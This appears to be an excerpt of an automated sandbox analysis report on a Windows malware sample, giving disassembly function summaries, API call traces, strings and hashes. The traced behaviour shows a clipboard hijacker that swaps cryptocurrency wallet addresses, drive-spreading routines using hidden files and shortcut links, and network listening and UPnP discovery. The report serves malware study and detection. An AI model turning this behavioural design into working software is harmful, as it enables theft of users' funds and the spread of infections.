                                              control_flow_graph 89 40ef10-40ef70 memset * 2 CreateProcessW 90 40ef81-40efa5 ShellExecuteW 89->90 91 40ef72-40ef7f Sleep 89->91 93 40efb6 90->93 94 40efa7-40efb4 Sleep 90->94 92 40efb8-40efbb 91->92 93->92 94->92
                                              APIs
                                              • memset.NTDLL ref: 0040EF1E
                                              • memset.NTDLL ref: 0040EF2E
                                              • CreateProcessW.KERNELBASE(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EF67
                                              • Sleep.KERNELBASE(000003E8), ref: 0040EF77
                                              • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EF92
                                              • Sleep.KERNEL32(000003E8), ref: 0040EFAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                              • String ID: $D$open
                                              • API String ID: 3787208655-2182757814
                                              • Opcode ID: e2b186ad004b62e9ae343f364b445b77cfefa0e7e3aa45da8de068108c2434a4
                                              • Instruction ID: 2af3465f2ac7e3bdaf7f942b51208d096d5e25dcc258d3f6adac25a8060dddc3
                                              • Opcode Fuzzy Hash: e2b186ad004b62e9ae343f364b445b77cfefa0e7e3aa45da8de068108c2434a4
                                              • Instruction Fuzzy Hash: 6F114F71A84308BBEB10DB90DD46FDE7778AB14B00F204125FA09BE2C1D7F56A44C75A

                                              Non-executed Functions

                                              Function 00406650 Relevance: 77.3, APIs: 34, Strings: 10, Instructions: 300fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 99 406650-406665 _chkstk 100 406667-406669 99->100 101 40666e-406720 wsprintfW * 5 PathFileExistsW 99->101 102 406b48-406b4b 100->102 103 406722-406743 call 40ed00 101->103 104 406764-406773 PathFileExistsW 101->104 103->104 117 406745-40675e SetFileAttributesW DeleteFileW 103->117 106 406803-406812 PathFileExistsW 104->106 107 406779-4067a7 SetFileAttributesW DeleteFileW PathFileExistsW 104->107 110 406814-40681a 106->110 111 406859-40687a FindFirstFileW 106->111 108 4067a9-4067ba CreateDirectoryW 107->108 109 4067cb-4067da PathFileExistsW 107->109 108->109 113 4067bc-4067c5 SetFileAttributesW 108->113 109->106 114 4067dc-4067f2 CopyFileW 109->114 115 406834-406847 call 406400 110->115 116 40681c-406832 call 406400 110->116 118 406880-406938 111->118 119 406b42 111->119 113->109 114->106 121 4067f4-4067fd SetFileAttributesW 114->121 130 40684a-406853 SetFileAttributesW 115->130 116->130 117->104 120 406942-406956 lstrcmpW 118->120 119->102 124 406958-40696c lstrcmpW 120->124 125 40696e 120->125 121->106 124->125 128 406973-406984 124->128 129 406b19-406b2f FindNextFileW 125->129 131 406995-40699c 128->131 129->120 132 406b35-406b3c FindClose 129->132 130->111 133 4069ca-4069d3 131->133 134 40699e-4069bb lstrcmpiW 131->134 132->119 137 4069d5 133->137 138 4069da-4069eb 133->138 135 4069bd 134->135 136 4069bf-4069c6 134->136 135->131 136->133 137->129 140 4069fc-406a03 138->140 141 406a73-406a7c 140->141 142 406a05-406a22 PathMatchSpecW 140->142 143 406a83-406a92 PathFileExistsW 141->143 144 406a7e 141->144 145 406a24 142->145 146 406a26-406a6c wsprintfW SetFileAttributesW DeleteFileW 142->146 148 406a94 143->148 149 406a99-406ae9 wsprintfW * 2 143->149 144->129 145->140 146->141 148->129 150 406b03-406b13 MoveFileExW 149->150 151 406aeb-406b01 call 406510 149->151 150->129 151->129
                                              APIs
                                              • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                              • wsprintfW.USER32 ref: 0040668F
                                              • wsprintfW.USER32 ref: 004066AF
                                              • wsprintfW.USER32 ref: 004066CF
                                              • wsprintfW.USER32 ref: 004066EF
                                              • wsprintfW.USER32 ref: 00406708
                                              • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                              • DeleteFileW.KERNEL32(?), ref: 0040675E
                                              • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                              • DeleteFileW.KERNEL32(?), ref: 00406792
                                              • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                              • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                              • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                              • CopyFileW.KERNEL32(00417500,?,00000000), ref: 004067EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                              • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDrvConfig.exe$%s\*$shell32.dll$shell32.dll
                                              • API String ID: 2120662298-3006713477
                                              • Opcode ID: db5eccb7a8f15aa8004616f5cf87b59d8a7d315b42364bc1ec8f026dd92e313a
                                              • Instruction ID: c06ff6b6fb177b83c5a42a6bb152b383d4bd735e421ae8a12f9cadfa06fd6cc4
                                              • Opcode Fuzzy Hash: db5eccb7a8f15aa8004616f5cf87b59d8a7d315b42364bc1ec8f026dd92e313a
                                              • Instruction Fuzzy Hash: A8D164B5900258ABCB20DF50DC54FEA77B8BB48304F04C5EAF20AA6191D7B99BD4CF59
                                              Function 004048A0 Relevance: 74.5, APIs: 26, Strings: 16, Instructions: 951clipboardstringmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(00000000), ref: 004048BC
                                              • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404C72
                                              • StrStrW.SHLWAPI(00000000,cosmos), ref: 00404C9D
                                              • StrStrW.SHLWAPI(00000000,addr), ref: 00404CC8
                                              • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D67
                                              • StrStrW.SHLWAPI(00000000,ronin:), ref: 00404D7E
                                              • StrStrW.SHLWAPI(00000000,nano_), ref: 00404D95
                                              • isalpha.NTDLL ref: 00404E14
                                              • isdigit.NTDLL ref: 00404E2B
                                              • StrStrW.SHLWAPI(00000000,bnb), ref: 0040530C
                                              • StrStrW.SHLWAPI(00000000,band), ref: 00405326
                                              • StrStrW.SHLWAPI(00000000,bc1), ref: 00405340
                                              • StrStrW.SHLWAPI(00000000,ronin:), ref: 0040535A
                                              • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00405374
                                              • StrStrW.SHLWAPI(00000000,cosmos), ref: 0040538E
                                              • StrStrW.SHLWAPI(00000000,addr), ref: 004053A8
                                              • StrStrW.SHLWAPI(00000000,nano_), ref: 004053C2
                                              • lstrlenA.KERNEL32(00000000), ref: 00405483
                                              • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 0040549E
                                              • GlobalLock.KERNEL32(00000000), ref: 004054B1
                                              • memcpy.NTDLL(00000000,00000000,-00000001), ref: 004054CF
                                              • GlobalUnlock.KERNEL32(00000000), ref: 004054DB
                                              • OpenClipboard.USER32(00000000), ref: 004054E3
                                              • EmptyClipboard.USER32 ref: 004054ED
                                              • SetClipboardData.USER32(00000001,00000000), ref: 004054F9
                                              • CloseClipboard.USER32 ref: 004054FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
                                              • String ID: 0$addr$addr$band$bc1$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$hA$nano_$nano_$ronin:$ronin:
                                              • API String ID: 2780752356-1454159098
                                              • Opcode ID: 1df929a5d8f5b9e1bfb1efcb18d3a29233e0794c52f64d10113e7b7f4ba58d28
                                              • Instruction ID: d3cde74942e7afdaaf364769f000daf6be216c4f7804bb878a93964b207ef83b
                                              • Opcode Fuzzy Hash: 1df929a5d8f5b9e1bfb1efcb18d3a29233e0794c52f64d10113e7b7f4ba58d28
                                              • Instruction Fuzzy Hash: DE8239B0A00218EACF548F41C0945BE7BB2EF82751F60C0ABE9456F294D77D9EC1DB98
                                              Function 004080B0 Relevance: 62.3, APIs: 34, Strings: 1, Instructions: 1037COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl_aullshr
                                              • String ID: Y
                                              • API String ID: 673498613-3233089245
                                              • Opcode ID: 7286a3771c49fe6dd85f91ec8c346872754a56a447a9e0d5d293665731471eb7
                                              • Instruction ID: 38e152ebd7ea95bc8f380bf4b2252a64c27ffc37453e75a420e7eb0cbbf7c908
                                              • Opcode Fuzzy Hash: 7286a3771c49fe6dd85f91ec8c346872754a56a447a9e0d5d293665731471eb7
                                              • Instruction Fuzzy Hash: B8D22A79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80
                                              Function 004080D9 Relevance: 52.0, APIs: 34, Instructions: 1023COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl_aullshr
                                              • String ID:
                                              • API String ID: 673498613-0
                                              • Opcode ID: 21d62b95df156d65b0f58ece9101bfe8da6afc21161c3ccb89e1e1339c27952d
                                              • Instruction ID: 210ecbc2d6fc9dc29dd7b869163d3ab15cad43ed1e12d09afb70b2b575c36fe3
                                              • Opcode Fuzzy Hash: 21d62b95df156d65b0f58ece9101bfe8da6afc21161c3ccb89e1e1339c27952d
                                              • Instruction Fuzzy Hash: 30D22A79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80
                                              Function 00405910 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 629 405910-405932 GetWindowLongW 630 405934-40593b 629->630 631 405956-40595d 629->631 632 405941-405945 630->632 633 4059c7-4059d8 IsClipboardFormatAvailable 630->633 634 405986-40598c 631->634 635 40595f 631->635 638 405964-405981 SetClipboardViewer SetWindowLongW 632->638 639 405947-40594b 632->639 636 4059e3-4059ed IsClipboardFormatAvailable 633->636 637 4059da-4059e1 633->637 641 4059a6-4059aa 634->641 642 40598e-4059a4 SetWindowLongW 634->642 640 405b44-405b5d DefWindowProcA 635->640 646 4059f8-405a02 IsClipboardFormatAvailable 636->646 647 4059ef-4059f6 636->647 645 405a0b-405a0f 637->645 638->640 648 405951 639->648 649 405afd-405b3e RegisterRawInputDevices ChangeClipboardChain 639->649 643 4059c2 641->643 644 4059ac-4059bc SendMessageA 641->644 642->643 643->640 644->643 651 405a15-405a1f OpenClipboard 645->651 652 405adf-405ae3 645->652 646->645 650 405a04 646->650 647->645 648->640 649->640 650->645 651->652 655 405a25-405a36 GetClipboardData 651->655 653 405ae5-405af5 SendMessageA 652->653 654 405afb 652->654 653->654 654->640 656 405a38 655->656 657 405a3d-405a4e GlobalLock 655->657 656->640 658 405a50 657->658 659 405a55-405a66 657->659 658->640 660 405a68-405a6c 659->660 661 405a89-405a9c call 405630 659->661 662 405a9e-405aae call 405750 660->662 663 405a6e-405a72 660->663 669 405ab1-405ac5 GlobalUnlock CloseClipboard 661->669 662->669 665 405a74 663->665 666 405a76-405a87 call 405510 663->666 665->669 666->669 669->652 673 405ac7-405adc call 4048a0 call 40a740 669->673 673->652
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                              • SetClipboardViewer.USER32(?), ref: 00405968
                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                              • OpenClipboard.USER32(00000000), ref: 00405A17
                                              • GetClipboardData.USER32(00000000), ref: 00405A29
                                              • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                              • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                              • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                              • String ID:
                                              • API String ID: 3549449529-0
                                              • Opcode ID: ce536a5ebd17aa25bd8c63565adcaae9255b97c75774932fd7b0e60d3253294e
                                              • Instruction ID: 140c23de002baebc09e84a4b6840f2c6f62578de50faf7348504d1cb8e8204ab
                                              • Opcode Fuzzy Hash: ce536a5ebd17aa25bd8c63565adcaae9255b97c75774932fd7b0e60d3253294e
                                              • Instruction Fuzzy Hash: 80710C75A00608EFDF14DFA4D988BAFB7B4EB48300F10856AE506B7290D7799A40CF69
                                              Function 00406510 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85filestringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 704 406510-40655f CreateDirectoryW wsprintfW FindFirstFileW 705 406565-406579 lstrcmpW 704->705 706 40663f-406642 704->706 707 406591 705->707 708 40657b-40658f lstrcmpW 705->708 710 40660c-406622 FindNextFileW 707->710 708->707 709 406593-4065dc wsprintfW * 2 708->709 712 4065f6-406606 MoveFileExW 709->712 713 4065de-4065f4 call 406510 709->713 710->705 711 406628-406639 FindClose RemoveDirectoryW 710->711 711->706 712->710 713->710
                                              APIs
                                              • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                              • wsprintfW.USER32 ref: 00406535
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                              • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406571
                                              • lstrcmpW.KERNEL32(?,00410FCC), ref: 00406587
                                              • wsprintfW.USER32 ref: 004065AA
                                              • wsprintfW.USER32 ref: 004065CA
                                              • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                              • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                              • FindClose.KERNEL32(000000FF), ref: 0040662F
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                              • String ID: %s\%s$%s\%s$%s\*
                                              • API String ID: 92872011-445461498
                                              • Opcode ID: aaf4b3f36bfa67770f4778d47adab31ac8eaf14f3968b868ec32d0f8b28c6d5c
                                              • Instruction ID: 29a521c4e1aad10613397e171bad1bd73fe874f8ff332ca0de340875b50b0acb
                                              • Opcode Fuzzy Hash: aaf4b3f36bfa67770f4778d47adab31ac8eaf14f3968b868ec32d0f8b28c6d5c
                                              • Instruction Fuzzy Hash: 56315BB5500218AFCB10DB60EC85FDA7778AB48701F40C5A9F609A3185DBB5DAD9CF68
                                              Function 00406B50 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106sleepthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNEL32(000003E8), ref: 00406B5E
                                              • GetModuleFileNameW.KERNEL32(00000000,00417500,00000104), ref: 00406B70
                                                • Part of subcall function 0040ED00: CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040ED20
                                                • Part of subcall function 0040ED00: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ED35
                                                • Part of subcall function 0040ED00: CloseHandle.KERNEL32(000000FF), ref: 0040ED42
                                              • ExitThread.KERNEL32 ref: 00406CDA
                                                • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                • Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                • Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                              • Sleep.KERNEL32(000007D0), ref: 00406CCD
                                                • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 004062B3
                                              • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                              • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                              • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                              • wsprintfW.USER32 ref: 00406C52
                                              • wsprintfW.USER32 ref: 00406C72
                                              • wsprintfW.USER32 ref: 00406C95
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                              • String ID: (%dGB)$%s%s$Unnamed volume
                                              • API String ID: 1650488544-2117135753
                                              • Opcode ID: 28cf1d750f559b85cf67cfd50a9e6b26b5fb1b314e0712f8dd8363f24fb25f9f
                                              • Instruction ID: 6971fabc066a78c2b5f4f93c2536245faf55c75ef939042e540841f18162a7fc
                                              • Opcode Fuzzy Hash: 28cf1d750f559b85cf67cfd50a9e6b26b5fb1b314e0712f8dd8363f24fb25f9f
                                              • Instruction Fuzzy Hash: 1D419BB1900214BBE714DB94DD55FEE7778BB48700F1081A5F20AB61D0DA785794CF6A
                                              Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                              • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                • Part of subcall function 0040D6C0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D6DE
                                              • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                              • setsockopt.WS2_32 ref: 004020D1
                                              • htons.WS2_32(?), ref: 00402101
                                              • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                              • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                              • WSACreateEvent.WS2_32 ref: 0040213A
                                              • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                • Part of subcall function 0040D6F0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D714
                                                • Part of subcall function 0040D6F0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D76F
                                                • Part of subcall function 0040D6F0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D7AC
                                                • Part of subcall function 0040D6F0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D7B7
                                                • Part of subcall function 0040D6F0: DuplicateHandle.KERNEL32(00000000), ref: 0040D7BE
                                                • Part of subcall function 0040D6F0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D7D2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                              • String ID:
                                              • API String ID: 1603358586-0
                                              • Opcode ID: 23dfeb1008158e2e0cd7513cecaa842fef64be5ff76144f1ff25a44a66e0fb2a
                                              • Instruction ID: 5f4ab44496f95361e3b7ac477a06260d9546e6561ad256066a099106afd7ac33
                                              • Opcode Fuzzy Hash: 23dfeb1008158e2e0cd7513cecaa842fef64be5ff76144f1ff25a44a66e0fb2a
                                              • Instruction Fuzzy Hash: 2B41C070640701BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA2D4E7F4E445875A
                                              Function 0040DCA0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117networkstringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 0040DCBA
                                              • htons.WS2_32(0000076C), ref: 0040DCF0
                                              • inet_addr.WS2_32(239.255.255.250), ref: 0040DCFF
                                              • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DD1D
                                                • Part of subcall function 0040B010: htons.WS2_32(00000050), ref: 0040B03D
                                                • Part of subcall function 0040B010: socket.WS2_32(00000002,00000001,00000000), ref: 0040B05D
                                                • Part of subcall function 0040B010: connect.WS2_32(000000FF,?,00000010), ref: 0040B076
                                                • Part of subcall function 0040B010: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B0A8
                                              • bind.WS2_32(000000FF,?,00000010), ref: 0040DD53
                                              • lstrlenA.KERNEL32(00411D70,00000000,?,00000010), ref: 0040DD6C
                                              • sendto.WS2_32(000000FF,00411D70,00000000), ref: 0040DD7B
                                              • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DD95
                                                • Part of subcall function 0040DE20: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DE6E
                                                • Part of subcall function 0040DE20: Sleep.KERNEL32(000003E8), ref: 0040DE7E
                                                • Part of subcall function 0040DE20: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DE9B
                                                • Part of subcall function 0040DE20: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DEB1
                                                • Part of subcall function 0040DE20: StrChrA.SHLWAPI(?,0000000D), ref: 0040DEDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                              • String ID: 239.255.255.250
                                              • API String ID: 726339449-2186272203
                                              • Opcode ID: 67bb0c7a586e0ff2326b65c0e0cd249105ca887c7b19898e2fcb7942032de1f3
                                              • Instruction ID: 4840ad5dfb28dde6295409afe741e8bd11bfa900d245e54f0039e4319b19f377
                                              • Opcode Fuzzy Hash: 67bb0c7a586e0ff2326b65c0e0cd249105ca887c7b19898e2fcb7942032de1f3
                                              • Instruction Fuzzy Hash: 7C41D8B4E00208ABDB14DFE4E889BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                              Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                              • htons.WS2_32(?), ref: 00401508
                                              • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                              • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
